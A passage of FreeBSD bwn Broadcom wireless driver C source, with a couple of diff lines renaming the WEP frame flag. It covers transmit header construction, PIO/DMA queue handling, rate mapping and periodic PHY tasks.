{ KASSERT(bwn_dma_freeslot(dr) >= BWN_TX_SLOTS_PER_FRAME, ("%s:%d: fail", __func__, __LINE__)); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; dr->dr_stop = 0; } } static void bwn_pio_handle_txeof(struct bwn_mac *mac, const struct bwn_txstatus *status) { struct bwn_pio_txqueue *tq; struct bwn_pio_txpkt *tp = NULL; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; BWN_ASSERT_LOCKED(sc); tq = bwn_pio_parse_cookie(mac, status->cookie, &tp); if (tq == NULL) return; tq->tq_used -= roundup(tp->tp_m->m_pkthdr.len + BWN_HDRSIZE(mac), 4); tq->tq_free++; if (tp->tp_ni != NULL) { /* * Do any tx complete callback. Note this must * be done before releasing the node reference. */ if (tp->tp_m->m_flags & M_TXCB) ieee80211_process_callback(tp->tp_ni, tp->tp_m, 0); ieee80211_free_node(tp->tp_ni); tp->tp_ni = NULL; } m_freem(tp->tp_m); tp->tp_m = NULL; TAILQ_INSERT_TAIL(&tq->tq_pktlist, tp, tp_list); ifp->if_opackets++; sc->sc_watchdog_timer = 0; if (tq->tq_stop) { ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; tq->tq_stop = 0; } } static void bwn_phy_txpower_check(struct bwn_mac *mac, uint32_t flags) { struct bwn_softc *sc = mac->mac_sc; struct bwn_phy *phy = &mac->mac_phy; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; unsigned long now; int result; BWN_GETTIME(now); if (!(flags & BWN_TXPWR_IGNORE_TIME) && time_before(now, phy->nexttime)) return; phy->nexttime = now + 2 * 1000; if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BU4306) return; if (phy->recalc_txpwr != NULL) { result = phy->recalc_txpwr(mac, (flags & BWN_TXPWR_IGNORE_TSSI) ? 1 : 0); if (result == BWN_TXPWR_RES_DONE) return; KASSERT(result == BWN_TXPWR_RES_NEED_ADJUST, ("%s: fail", __func__)); KASSERT(phy->set_txpwr != NULL, ("%s: fail", __func__)); ieee80211_runtask(ic, &mac->mac_txpower); } } static uint16_t bwn_pio_rx_read_2(struct bwn_pio_rxqueue *prq, uint16_t offset) { return (BWN_READ_2(prq->prq_mac, prq->prq_base + offset)); } static uint32_t bwn_pio_rx_read_4(struct bwn_pio_rxqueue *prq, uint16_t offset) { return (BWN_READ_4(prq->prq_mac, prq->prq_base + offset)); } static void bwn_pio_rx_write_2(struct bwn_pio_rxqueue *prq, uint16_t offset, uint16_t value) { BWN_WRITE_2(prq->prq_mac, prq->prq_base + offset, value); } static void bwn_pio_rx_write_4(struct bwn_pio_rxqueue *prq, uint16_t offset, uint32_t value) { BWN_WRITE_4(prq->prq_mac, prq->prq_base + offset, value); } static int bwn_ieeerate2hwrate(struct bwn_softc *sc, int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 14 Table 80) */ case 12: return (BWN_OFDM_RATE_6MB); case 18: return (BWN_OFDM_RATE_9MB); case 24: return (BWN_OFDM_RATE_12MB); case 36: return (BWN_OFDM_RATE_18MB); case 48: return (BWN_OFDM_RATE_24MB); case 72: return (BWN_OFDM_RATE_36MB); case 96: return (BWN_OFDM_RATE_48MB); case 108: return (BWN_OFDM_RATE_54MB); /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return (BWN_CCK_RATE_1MB); case 4: return (BWN_CCK_RATE_2MB); case 11: return (BWN_CCK_RATE_5MB); case 22: return (BWN_CCK_RATE_11MB); } device_printf(sc->sc_dev, "unsupported rate %d\n", rate); return (BWN_CCK_RATE_1MB); } static int bwn_set_txhdr(struct bwn_mac *mac, struct ieee80211_node *ni, struct mbuf *m, struct bwn_txhdr *txhdr, uint16_t cookie) { const struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; struct ieee80211_frame *wh; struct ieee80211_frame *protwh; struct ieee80211_frame_cts *cts; struct ieee80211_frame_rts *rts; const struct ieee80211_txparam *tp; struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mbuf *mprot; unsigned int len; uint32_t macctl = 0; int protdur, rts_rate, rts_rate_fb, ismcast, isshort, rix, type; uint16_t phyctl = 0; uint8_t rate, rate_fb; wh = mtod(m, struct ieee80211_frame *); memset(txhdr, 0, sizeof(*txhdr)); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; /* * Find TX rate */ tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (type != IEEE80211_FC0_TYPE_DATA || (m->m_flags & M_EAPOL)) rate = rate_fb = tp->mgmtrate; else if (ismcast) rate = rate_fb = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = rate_fb = tp->ucastrate; else { rix = ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; if (rix > 0) rate_fb = ni->ni_rates.rs_rates[rix - 1] & IEEE80211_RATE_VAL; else rate_fb = rate; } sc->sc_tx_rate = rate; rate = bwn_ieeerate2hwrate(sc, rate); rate_fb = bwn_ieeerate2hwrate(sc, rate_fb); txhdr->phyrate = (BWN_ISOFDMRATE(rate)) ? bwn_plcp_getofdm(rate) : bwn_plcp_getcck(rate); bcopy(wh->i_fc, txhdr->macfc, sizeof(txhdr->macfc)); bcopy(wh->i_addr1, txhdr->addr1, IEEE80211_ADDR_LEN); if ((rate_fb == rate) || (*(u_int16_t *)wh->i_dur & htole16(0x8000)) || (*(u_int16_t *)wh->i_dur == htole16(0))) txhdr->dur_fb = *(u_int16_t *)wh->i_dur; else txhdr->dur_fb = ieee80211_compute_duration(ic->ic_rt, m->m_pkthdr.len, rate, isshort); /* XXX TX encryption */ bwn_plcp_genhdr(BWN_ISOLDFMT(mac) ? (struct bwn_plcp4 *)(&txhdr->body.old.plcp) : (struct bwn_plcp4 *)(&txhdr->body.new.plcp), m->m_pkthdr.len + IEEE80211_CRC_LEN, rate); bwn_plcp_genhdr((struct bwn_plcp4 *)(&txhdr->plcp_fb), m->m_pkthdr.len + IEEE80211_CRC_LEN, rate_fb); txhdr->eftypes |= (BWN_ISOFDMRATE(rate_fb)) ? BWN_TX_EFT_FB_OFDM : BWN_TX_EFT_FB_CCK; txhdr->chan = phy->chan; phyctl |= (BWN_ISOFDMRATE(rate)) ? BWN_TX_PHY_ENC_OFDM : BWN_TX_PHY_ENC_CCK; if (isshort && (rate == BWN_CCK_RATE_2MB || rate == BWN_CCK_RATE_5MB || rate == BWN_CCK_RATE_11MB)) phyctl |= BWN_TX_PHY_SHORTPRMBL; /* XXX TX antenna selection */ switch (bwn_antenna_sanitize(mac, 0)) { case 0: phyctl |= BWN_TX_PHY_ANT01AUTO; break; case 1: phyctl |= BWN_TX_PHY_ANT0; break; case 2: phyctl |= BWN_TX_PHY_ANT1; break; case 3: phyctl |= BWN_TX_PHY_ANT2; break; case 4: phyctl |= BWN_TX_PHY_ANT3; break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } if (!ismcast) macctl |= BWN_TX_MAC_ACK; macctl |= (BWN_TX_MAC_HWSEQ | BWN_TX_MAC_START_MSDU); if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && m->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) macctl |= BWN_TX_MAC_LONGFRAME; if (ic->ic_flags & IEEE80211_F_USEPROT) { /* XXX RTS rate is always 1MB??? */ rts_rate = BWN_CCK_RATE_1MB; rts_rate_fb = bwn_get_fbrate(rts_rate); protdur = ieee80211_compute_duration(ic->ic_rt, m->m_pkthdr.len, rate, isshort) + + ieee80211_ack_duration(ic->ic_rt, rate, isshort); if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) { cts = (struct ieee80211_frame_cts *)(BWN_ISOLDFMT(mac) ? (txhdr->body.old.rts_frame) : (txhdr->body.new.rts_frame)); mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, protdur); KASSERT(mprot != NULL, ("failed to alloc mbuf\n")); bcopy(mtod(mprot, uint8_t *), (uint8_t *)cts, mprot->m_pkthdr.len); m_freem(mprot); macctl |= BWN_TX_MAC_SEND_CTSTOSELF; len = sizeof(struct ieee80211_frame_cts); } else { rts = (struct ieee80211_frame_rts *)(BWN_ISOLDFMT(mac) ? (txhdr->body.old.rts_frame) : (txhdr->body.new.rts_frame)); protdur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); mprot = ieee80211_alloc_rts(ic, wh->i_addr1, wh->i_addr2, protdur); KASSERT(mprot != NULL, ("failed to alloc mbuf\n")); bcopy(mtod(mprot, uint8_t *), (uint8_t *)rts, mprot->m_pkthdr.len); m_freem(mprot); macctl |= BWN_TX_MAC_SEND_RTSCTS; len = sizeof(struct ieee80211_frame_rts); } len += IEEE80211_CRC_LEN; bwn_plcp_genhdr((struct bwn_plcp4 *)((BWN_ISOLDFMT(mac)) ? &txhdr->body.old.rts_plcp : &txhdr->body.new.rts_plcp), len, rts_rate); bwn_plcp_genhdr((struct bwn_plcp4 *)&txhdr->rts_plcp_fb, len, rts_rate_fb); protwh = (struct ieee80211_frame *)(BWN_ISOLDFMT(mac) ? (&txhdr->body.old.rts_frame) : (&txhdr->body.new.rts_frame)); txhdr->rts_dur_fb = *(u_int16_t *)protwh->i_dur; if (BWN_ISOFDMRATE(rts_rate)) { txhdr->eftypes |= BWN_TX_EFT_RTS_OFDM; txhdr->phyrate_rts = bwn_plcp_getofdm(rts_rate); } else { txhdr->eftypes |= BWN_TX_EFT_RTS_CCK; txhdr->phyrate_rts = bwn_plcp_getcck(rts_rate); } txhdr->eftypes |= (BWN_ISOFDMRATE(rts_rate_fb)) ? BWN_TX_EFT_RTS_FBOFDM : BWN_TX_EFT_RTS_FBCCK; } if (BWN_ISOLDFMT(mac)) txhdr->body.old.cookie = htole16(cookie); else txhdr->body.new.cookie = htole16(cookie); txhdr->macctl = htole32(macctl); txhdr->phyctl = htole16(phyctl); /* * TX radio tap */ if (ieee80211_radiotap_active_vap(vap)) { sc->sc_tx_th.wt_flags = 0; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; if (isshort && (rate == BWN_CCK_RATE_2MB || rate == BWN_CCK_RATE_5MB || rate == BWN_CCK_RATE_11MB)) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; sc->sc_tx_th.wt_rate = rate; ieee80211_radiotap_tx(vap, m); } return (0); } static void bwn_plcp_genhdr(struct bwn_plcp4 *plcp, const uint16_t octets, const uint8_t rate) { uint32_t d, plen; uint8_t *raw = plcp->o.raw; if (BWN_ISOFDMRATE(rate)) { d = bwn_plcp_getofdm(rate); KASSERT(!(octets & 0xf000), ("%s:%d: fail", __func__, __LINE__)); d |= (octets << 5); plcp->o.data = htole32(d); } else { plen = octets * 16 / rate; if ((octets * 16 % rate) > 0) { plen++; if ((rate == BWN_CCK_RATE_11MB) && ((octets * 8 % 11) < 4)) { raw[1] = 0x84; } else raw[1] = 0x04; } else raw[1] = 0x04; plcp->o.data |= htole32(plen << 16); raw[0] = bwn_plcp_getcck(rate); } } static uint8_t bwn_antenna_sanitize(struct bwn_mac *mac, uint8_t n) { struct bwn_softc *sc = mac->mac_sc; uint8_t mask; if (n == 0) return (0); if (mac->mac_phy.gmode) mask = siba_sprom_get_ant_bg(sc->sc_dev); else mask = siba_sprom_get_ant_a(sc->sc_dev); if (!(mask & (1 << (n - 1)))) return (0); return (n); } static uint8_t bwn_get_fbrate(uint8_t bitrate) { switch (bitrate) { case BWN_CCK_RATE_1MB: return (BWN_CCK_RATE_1MB); case BWN_CCK_RATE_2MB: return (BWN_CCK_RATE_1MB); case BWN_CCK_RATE_5MB: return (BWN_CCK_RATE_2MB); case BWN_CCK_RATE_11MB: return (BWN_CCK_RATE_5MB); case BWN_OFDM_RATE_6MB: return (BWN_CCK_RATE_5MB); case BWN_OFDM_RATE_9MB: return (BWN_OFDM_RATE_6MB); case BWN_OFDM_RATE_12MB: return (BWN_OFDM_RATE_9MB); case BWN_OFDM_RATE_18MB: return (BWN_OFDM_RATE_12MB); case BWN_OFDM_RATE_24MB: return (BWN_OFDM_RATE_18MB); case BWN_OFDM_RATE_36MB: return (BWN_OFDM_RATE_24MB); case BWN_OFDM_RATE_48MB: return (BWN_OFDM_RATE_36MB); case BWN_OFDM_RATE_54MB: return (BWN_OFDM_RATE_48MB); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (0); } static uint32_t bwn_pio_write_multi_4(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, uint32_t ctl, const void *_data, int len) { struct bwn_softc *sc = mac->mac_sc; uint32_t value = 0; const uint8_t *data = _data; ctl |= BWN_PIO8_TXCTL_0_7 | BWN_PIO8_TXCTL_8_15 | BWN_PIO8_TXCTL_16_23 | BWN_PIO8_TXCTL_24_31; bwn_pio_write_4(mac, tq, BWN_PIO8_TXCTL, ctl); siba_write_multi_4(sc->sc_dev, data, (len & ~3), tq->tq_base + BWN_PIO8_TXDATA); if (len & 3) { ctl &= ~(BWN_PIO8_TXCTL_8_15 | BWN_PIO8_TXCTL_16_23 | BWN_PIO8_TXCTL_24_31); data = &(data[len - 1]); switch (len & 3) { case 3: ctl |= BWN_PIO8_TXCTL_16_23; value |= (uint32_t)(*data) << 16; data--; case 2: ctl |= BWN_PIO8_TXCTL_8_15; value |= (uint32_t)(*data) << 8; data--; case 1: value |= (uint32_t)(*data); } bwn_pio_write_4(mac, tq, BWN_PIO8_TXCTL, ctl); bwn_pio_write_4(mac, tq, BWN_PIO8_TXDATA, value); } return (ctl); } static void bwn_pio_write_4(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, uint16_t offset, uint32_t value) { BWN_WRITE_4(mac, tq->tq_base + offset, value); } static uint16_t bwn_pio_write_multi_2(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, uint16_t ctl, const void *_data, int len) { struct bwn_softc *sc = mac->mac_sc; const uint8_t *data = _data; ctl |= BWN_PIO_TXCTL_WRITELO | BWN_PIO_TXCTL_WRITEHI; BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXCTL, ctl); siba_write_multi_2(sc->sc_dev, data, (len & ~1), tq->tq_base + BWN_PIO_TXDATA); if (len & 1) { ctl &= ~BWN_PIO_TXCTL_WRITEHI; BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXCTL, ctl); BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXDATA, data[len - 1]); } return (ctl); } static uint16_t bwn_pio_write_mbuf_2(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, uint16_t ctl, struct mbuf *m0) { int i, j = 0; uint16_t data = 0; const uint8_t *buf; struct mbuf *m = m0; ctl |= BWN_PIO_TXCTL_WRITELO | BWN_PIO_TXCTL_WRITEHI; BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXCTL, ctl); for (; m != NULL; m = m->m_next) { buf = mtod(m, const uint8_t *); for (i = 0; i < m->m_len; i++) { if (!((j++) % 2)) data |= buf[i]; else { data |= (buf[i] << 8); BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXDATA, data); data = 0; } } } if (m0->m_pkthdr.len % 2) { ctl &= ~BWN_PIO_TXCTL_WRITEHI; BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXCTL, ctl); BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXDATA, data); } return (ctl); } static void bwn_set_slot_time(struct bwn_mac *mac, uint16_t time) { if (mac->mac_phy.type != BWN_PHYTYPE_G) return; BWN_WRITE_2(mac, 0x684, 510 + time); bwn_shm_write_2(mac, BWN_SHARED, 0x0010, time); } static struct bwn_dma_ring * bwn_dma_select(struct bwn_mac *mac, uint8_t prio) { if ((mac->mac_flags & BWN_MAC_FLAG_WME) == 0) return (mac->mac_method.dma.wme[WME_AC_BE]); switch (prio) { case 3: return (mac->mac_method.dma.wme[WME_AC_VO]); case 2: return (mac->mac_method.dma.wme[WME_AC_VI]); case 0: return (mac->mac_method.dma.wme[WME_AC_BE]); case 1: return (mac->mac_method.dma.wme[WME_AC_BK]); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (NULL); } static int bwn_dma_getslot(struct bwn_dma_ring *dr) { int slot; BWN_ASSERT_LOCKED(dr->dr_mac->mac_sc); KASSERT(dr->dr_tx, ("%s:%d: fail", __func__, __LINE__)); KASSERT(!(dr->dr_stop), ("%s:%d: fail", __func__, __LINE__)); KASSERT(bwn_dma_freeslot(dr) != 0, ("%s:%d: fail", __func__, __LINE__)); slot = bwn_dma_nextslot(dr, dr->dr_curslot); KASSERT(!(slot & ~0x0fff), ("%s:%d: fail", __func__, __LINE__)); dr->dr_curslot = slot; dr->dr_usedslot++; return (slot); } static int bwn_phy_shm_tssi_read(struct bwn_mac *mac, uint16_t shm_offset) { const uint8_t ofdm = (shm_offset != BWN_SHARED_TSSI_CCK); unsigned int a, b, c, d; unsigned int avg; uint32_t tmp; tmp = bwn_shm_read_4(mac, BWN_SHARED, shm_offset); a = tmp & 0xff; b = (tmp >> 8) & 0xff; c = (tmp >> 16) & 0xff; d = (tmp >> 24) & 0xff; if (a == 0 || a == BWN_TSSI_MAX || b == 0 || b == BWN_TSSI_MAX || c == 0 || c == BWN_TSSI_MAX || d == 0 || d == BWN_TSSI_MAX) return (ENOENT); bwn_shm_write_4(mac, BWN_SHARED, shm_offset, BWN_TSSI_MAX | (BWN_TSSI_MAX << 8) | (BWN_TSSI_MAX << 16) | (BWN_TSSI_MAX << 24)); if (ofdm) { a = (a + 32) & 0x3f; b = (b + 32) & 0x3f; c = (c + 32) & 0x3f; d = (d + 32) & 0x3f; } avg = (a + b + c + d + 2) / 4; if (ofdm) { if (bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_HFLO) & BWN_HF_4DB_CCK_POWERBOOST) avg = (avg >= 13) ? (avg - 13) : 0; } return (avg); } static void bwn_phy_g_setatt(struct bwn_mac *mac, int *bbattp, int *rfattp) { struct bwn_txpwr_loctl *lo = &mac->mac_phy.phy_g.pg_loctl; int rfatt = *rfattp; int bbatt = *bbattp; while (1) { if (rfatt > lo->rfatt.max && bbatt > lo->bbatt.max - 4) break; if (rfatt < lo->rfatt.min && bbatt < lo->bbatt.min + 4) break; if (bbatt > lo->bbatt.max && rfatt > lo->rfatt.max - 1) break; if (bbatt < lo->bbatt.min && rfatt < lo->rfatt.min + 1) break; if (bbatt > lo->bbatt.max) { bbatt -= 4; rfatt += 1; continue; } if (bbatt < lo->bbatt.min) { bbatt += 4; rfatt -= 1; continue; } if (rfatt > lo->rfatt.max) { rfatt -= 1; bbatt += 4; continue; } if (rfatt < lo->rfatt.min) { rfatt += 1; bbatt -= 4; continue; } break; } *rfattp = MIN(MAX(rfatt, lo->rfatt.min), lo->rfatt.max); *bbattp = MIN(MAX(bbatt, lo->bbatt.min), lo->bbatt.max); } static void bwn_phy_lock(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; KASSERT(siba_get_revid(sc->sc_dev) >= 3, ("%s: unsupported rev %d", __func__, siba_get_revid(sc->sc_dev))); if (ic->ic_opmode != IEEE80211_M_HOSTAP) bwn_psctl(mac, BWN_PS_AWAKE); } static void bwn_phy_unlock(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; KASSERT(siba_get_revid(sc->sc_dev) >= 3, ("%s: unsupported rev %d", __func__, siba_get_revid(sc->sc_dev))); if (ic->ic_opmode != IEEE80211_M_HOSTAP) bwn_psctl(mac, 0); } static void bwn_rf_lock(struct bwn_mac *mac) { BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) | BWN_MACCTL_RADIO_LOCK); BWN_READ_4(mac, BWN_MACCTL); DELAY(10); } static void bwn_rf_unlock(struct bwn_mac *mac) { BWN_READ_2(mac, BWN_PHYVER); BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_RADIO_LOCK); } static struct bwn_pio_txqueue * bwn_pio_parse_cookie(struct bwn_mac *mac, uint16_t cookie, struct bwn_pio_txpkt **pack) { struct bwn_pio *pio = &mac->mac_method.pio; struct bwn_pio_txqueue *tq = NULL; unsigned int index; switch (cookie & 0xf000) { case 0x1000: tq = &pio->wme[WME_AC_BK]; break; case 0x2000: tq = &pio->wme[WME_AC_BE]; break; case 0x3000: tq = &pio->wme[WME_AC_VI]; break; case 0x4000: tq = &pio->wme[WME_AC_VO]; break; case 0x5000: tq = &pio->mcast; break; } KASSERT(tq != NULL, ("%s:%d: fail", __func__, __LINE__)); if (tq == NULL) return (NULL); index = (cookie & 0x0fff); KASSERT(index < N(tq->tq_pkts), ("%s:%d: fail", __func__, __LINE__)); if (index >= N(tq->tq_pkts)) return (NULL); *pack = &tq->tq_pkts[index]; KASSERT(*pack != NULL, ("%s:%d: fail", __func__, __LINE__)); return (tq); } static void bwn_txpwr(void *arg, int npending) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; BWN_LOCK(sc); if (mac && mac->mac_status >= BWN_MAC_STATUS_STARTED && mac->mac_phy.set_txpwr != NULL) mac->mac_phy.set_txpwr(mac); BWN_UNLOCK(sc); } static void bwn_task_15s(struct bwn_mac *mac) { uint16_t reg; if (mac->mac_fw.opensource) { reg = bwn_shm_read_2(mac, BWN_SCRATCH, BWN_WATCHDOG_REG); if (reg) { bwn_restart(mac, "fw watchdog"); return; } bwn_shm_write_2(mac, BWN_SCRATCH, BWN_WATCHDOG_REG, 1); } if (mac->mac_phy.task_15s) mac->mac_phy.task_15s(mac); mac->mac_phy.txerrors = BWN_TXERROR_MAX; } static void bwn_task_30s(struct bwn_mac *mac) { if (mac->mac_phy.type != BWN_PHYTYPE_G || mac->mac_noise.noi_running) return; mac->mac_noise.noi_running = 1; mac->mac_noise.noi_nsamples = 0; bwn_noise_gensample(mac); } static void bwn_task_60s(struct bwn_mac *mac) { if (mac->mac_phy.task_60s) mac->mac_phy.task_60s(mac); bwn_phy_txpower_check(mac, BWN_TXPWR_IGNORE_TIME); } static void bwn_tasks(void *arg) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; BWN_ASSERT_LOCKED(sc); if (mac->mac_status != BWN_MAC_STATUS_STARTED) return; if (mac->mac_task_state % 4 == 0) bwn_task_60s(mac); if (mac->mac_task_state % 2 == 0) bwn_task_30s(mac); bwn_task_15s(mac); mac->mac_task_state++; callout_reset(&sc->sc_task_ch, hz * 15, bwn_tasks, mac); } static int bwn_plcp_get_ofdmrate(struct bwn_mac *mac, struct bwn_plcp6 *plcp, uint8_t a) { struct bwn_softc *sc = mac->mac_sc; KASSERT(a == 0, ("not support APHY\n")); switch (plcp->o.raw[0] & 0xf) { case 0xb: return (BWN_OFDM_RATE_6MB); case 0xf: return (BWN_OFDM_RATE_9MB); case 0xa: return (BWN_OFDM_RATE_12MB); case 0xe: return (BWN_OFDM_RATE_18MB); case 0x9: return (BWN_OFDM_RATE_24MB); case 0xd: return (BWN_OFDM_RATE_36MB); case 0x8: return (BWN_OFDM_RATE_48MB); case 0xc: return (BWN_OFDM_RATE_54MB); } device_printf(sc->sc_dev, "incorrect OFDM rate %d\n", plcp->o.raw[0] & 0xf); return (-1); } static int bwn_plcp_get_cckrate(struct bwn_mac *mac, struct bwn_plcp6 *plcp) { struct bwn_softc *sc = mac->mac_sc; switch (plcp->o.raw[0]) { case 0x0a: return (BWN_CCK_RATE_1MB); case 0x14: return (BWN_CCK_RATE_2MB); case 0x37: return (BWN_CCK_RATE_5MB); case 0x6e: return (BWN_CCK_RATE_11MB); } device_printf(sc->sc_dev, "incorrect CCK rate %d\n", plcp->o.raw[0]); return (-1); } static void bwn_rx_radiotap(struct bwn_mac *mac, struct mbuf *m, const struct bwn_rxhdr4 *rxhdr, struct bwn_plcp6 *plcp, int rate, int rssi, int noise) { struct bwn_softc *sc = mac->mac_sc; const struct ieee80211_frame_min *wh; uint64_t tsf; uint16_t low_mactime_now; if (htole16(rxhdr->phy_status0) & BWN_RX_PHYST0_SHORTPRMBL) sc->sc_rx_th.wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; wh = mtod(m, const struct ieee80211_frame_min *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) sc->sc_rx_th.wr_flags |= IEEE80211_RADIOTAP_F_WEP; bwn_tsf_read(mac, &tsf); low_mactime_now = tsf; tsf = tsf & ~0xffffULL; tsf += le16toh(rxhdr->mac_time); if (low_mactime_now < le16toh(rxhdr->mac_time)) tsf -= 0x10000; sc->sc_rx_th.wr_tsf = tsf; sc->sc_rx_th.wr_rate = rate; sc->sc_rx_th.wr_antsignal = rssi; sc->sc_rx_th.wr_antnoise = noise; } static void bwn_tsf_read(struct bwn_mac *mac, uint64_t *tsf) { uint32_t low, high; KASSERT(siba_get_revid(mac->mac_sc->sc_dev) >= 3, ("%s:%d: fail", __func__, __LINE__)); low = BWN_READ_4(mac, BWN_REV3PLUS_TSF_LOW); high = BWN_READ_4(mac, BWN_REV3PLUS_TSF_HIGH); *tsf = high; *tsf <<= 32; *tsf |= low; } static int bwn_dma_attach(struct bwn_mac *mac) { struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_softc *sc = mac->mac_sc; bus_addr_t lowaddr = 0; int error; if (siba_get_type(sc->sc_dev) == SIBA_TYPE_PCMCIA || bwn_usedma == 0) return (0); KASSERT(siba_get_revid(sc->sc_dev) >= 5, ("%s: fail", __func__)); mac->mac_flags |= BWN_MAC_FLAG_DMA; dma->dmatype = bwn_dma_gettype(mac); if (dma->dmatype == BWN_DMA_30BIT) lowaddr = BWN_BUS_SPACE_MAXADDR_30BIT; else if (dma->dmatype == BWN_DMA_32BIT) lowaddr = BUS_SPACE_MAXADDR_32BIT; else lowaddr = BUS_SPACE_MAXADDR; /* * Create top level DMA tag */ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), /* parent */ BWN_ALIGN, 0, /* alignment, bounds */ lowaddr, /* lowaddr */ BUS_SPACE_MAXADDR, /* highaddr */ NULL, NULL, /* filter, filterarg */ MAXBSIZE, /* maxsize */ BUS_SPACE_UNRESTRICTED, /* nsegments */ BUS_SPACE_MAXSIZE, /* maxsegsize */ 0, /* flags */ NULL, NULL, /* lockfunc, lockarg */ &dma->parent_dtag); if (error) { device_printf(sc->sc_dev, "can't create parent DMA tag\n"); return (error); } /* * Create TX/RX mbuf DMA tag */ error = bus_dma_tag_create(dma->parent_dtag, 1, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, BUS_SPACE_MAXSIZE_32BIT, 0, NULL, NULL, &dma->rxbuf_dtag); if (error) { device_printf(sc->sc_dev, "can't create mbuf DMA tag\n"); goto fail0; } error = bus_dma_tag_create(dma->parent_dtag, 1, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, BUS_SPACE_MAXSIZE_32BIT, 0, NULL, NULL, &dma->txbuf_dtag); if (error) { device_printf(sc->sc_dev, "can't create mbuf DMA tag\n"); goto fail1; } dma->wme[WME_AC_BK] = bwn_dma_ringsetup(mac, 0, 1, dma->dmatype); if (!dma->wme[WME_AC_BK]) goto fail2; dma->wme[WME_AC_BE] = bwn_dma_ringsetup(mac, 1, 1, dma->dmatype); if (!dma->wme[WME_AC_BE]) goto fail3; dma->wme[WME_AC_VI] = bwn_dma_ringsetup(mac, 2, 1, dma->dmatype); if (!dma->wme[WME_AC_VI]) goto fail4; dma->wme[WME_AC_VO] = bwn_dma_ringsetup(mac, 3, 1, dma->dmatype); if (!dma->wme[WME_AC_VO]) goto fail5; dma->mcast = bwn_dma_ringsetup(mac, 4, 1, dma->dmatype); if (!dma->mcast) goto fail6; dma->rx = bwn_dma_ringsetup(mac, 0, 0, dma->dmatype); if (!dma->rx) goto fail7; return (error); fail7: bwn_dma_ringfree(&dma->mcast); fail6: bwn_dma_ringfree(&dma->wme[WME_AC_VO]); fail5: bwn_dma_ringfree(&dma->wme[WME_AC_VI]); fail4: bwn_dma_ringfree(&dma->wme[WME_AC_BE]); fail3: bwn_dma_ringfree(&dma->wme[WME_AC_BK]); fail2: bus_dma_tag_destroy(dma->txbuf_dtag); fail1: bus_dma_tag_destroy(dma->rxbuf_dtag); fail0: bus_dma_tag_destroy(dma->parent_dtag); return (error); } static struct bwn_dma_ring * bwn_dma_parse_cookie(struct bwn_mac *mac, const struct bwn_txstatus *status, uint16_t cookie, int *slot) { struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_dma_ring *dr; struct bwn_softc *sc = mac->mac_sc; BWN_ASSERT_LOCKED(mac->mac_sc); switch (cookie & 0xf000) { case 0x1000: dr = dma->wme[WME_AC_BK]; break; case 0x2000: dr = dma->wme[WME_AC_BE]; break; case 0x3000: dr = dma->wme[WME_AC_VI]; break; case 0x4000: dr = dma->wme[WME_AC_VO]; break; case 0x5000: dr = dma->mcast; break; default: dr = NULL; KASSERT(0 == 1, ("invalid cookie value %d", cookie & 0xf000)); } *slot = (cookie & 0x0fff); if (*slot < 0 || *slot >= 